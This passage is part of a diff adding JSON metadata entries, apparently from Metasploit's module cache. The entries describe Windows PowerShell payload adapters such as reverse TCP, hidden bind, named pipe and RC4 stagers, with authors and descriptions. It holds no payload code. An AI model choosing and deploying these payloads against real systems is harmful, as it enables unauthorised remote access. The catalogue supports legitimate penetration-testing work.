DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP 
Stager", + "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a 
connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/peinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows 
x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/peinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + 
"payload_cmd/windows/powershell/peinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/peinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/peinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/peinject/find_tag", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/find_tag", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/peinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_named_pipe": { + "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/peinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + 
"URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + 
"payload_cmd/windows/powershell/peinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", + 
"check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/pingback_bind_tcp": { + "name": "Powershell Exec, Windows x86 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Execute an x86 
payload from a command via PowerShell.\n\nOpen a socket and report UUID when a connection is received (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/pingback_reverse_tcp": { + "name": "Powershell Exec, Windows x86 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/powershell_bind_tcp": { + "name": "Powershell Exec", + "fullname": 
"payload/cmd/windows/powershell/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/powershell_reverse_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
